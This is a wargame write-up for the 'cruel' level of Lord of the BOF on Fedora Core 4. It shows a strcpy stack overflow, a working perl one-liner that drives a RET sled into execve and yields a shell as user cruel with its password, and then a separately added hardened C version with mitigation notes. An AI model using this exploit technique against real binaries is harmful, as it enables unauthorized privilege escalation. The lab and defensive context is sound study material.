int $0x80

Wargame / Lord Of the BOF

dark_stone -> cruel

cd80 2013.10.15 14:42


[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sledding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}

I called the execve function using the values already on the stack as its arguments.

[dark_stone@Fedora_2ndFloor ~]$ ./cruel $(perl -e 'print "\xf9\x84\x04\x08"x77, "\xbc\x2a\x83\x00"')
[dark_stone@Fedora_2ndFloor ~]$ /tmp/cruel_pwned -p
cruel_pwned-3.00$ whoami
cruel
cruel_pwned-3.00$ my-pass
euid = 501
come on, come over
cruel_pwned-3.00$  
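For comparison, here is a hardened counterpart of cruel.c. This is an added example, not code from the wargame or from the original post: cruel.c copies argv[1] into a 256-byte stack buffer with strcpy() and no length check, which is the overflow the RET sled above drives (77 copies of a 4-byte address plus one more address is a 312-byte argument). The version below bounds the copy and rejects over-long input; the names safe_copy, run and check_len are my own.

```c
/* Hardened counterpart of cruel.c (added example, not the original code).
 * cruel.c does strcpy(buffer, argv[1]) into char buffer[256]; here the copy
 * is bounded and an argument that does not fit is refused. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 256   /* same buffer size as cruel.c */

/* Copy src into dst (capacity dstsz), always leaving dst NUL-terminated.
 * Returns 0 on success and -1 if src does not fit together with its
 * terminator; on failure dst is set to "" so a half-copied value is
 * never used by mistake. */
int safe_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n;

    if (dst == NULL || dstsz == 0)
        return -1;
    if (src == NULL) {
        dst[0] = '\0';
        return -1;
    }
    /* Measure src without scanning past the most we could ever store. */
    for (n = 0; n < dstsz && src[n] != '\0'; n++)
        ;
    if (n == dstsz) {            /* no room left for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);     /* n characters plus the terminator */
    return 0;
}

/* Same flow as main() in cruel.c. Returns 0 when the argument was copied
 * and printed, 1 on "argv error", 2 when the argument was rejected. */
int run(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (safe_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 2;
    }
    printf("%s\n", buffer);
    return 0;
}

/* Self-check: build a constructed argument of len 'A' characters, feed it
 * to safe_copy against a BUF_SIZE buffer and return safe_copy's result
 * (-2 only if the allocation itself fails). */
int check_len(size_t len)
{
    char buffer[BUF_SIZE];
    char *src = malloc(len + 1);
    int rc;

    if (src == NULL)
        return -2;
    memset(src, 'A', len);
    src[len] = '\0';
    rc = safe_copy(buffer, sizeof buffer, src);
    free(src);
    return rc;
}

int main(int argc, char *argv[])
{
    return run(argc, argv);
}
```

Built with `gcc -o cruel_safe cruel_safe.c` and run as `./cruel_safe $(perl -e 'print "A"x312')`, it reports the rejection and exits with status 2 instead of overwriting the saved return address. The bounded copy fixes this one bug; the sled in the post additionally depends on the binary's own code sitting at a fixed address (the 0x0804xxxx range of a non-PIE executable) while only the library is randomized, so building as PIE with a stack protector is the general mitigation on top of the length check.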
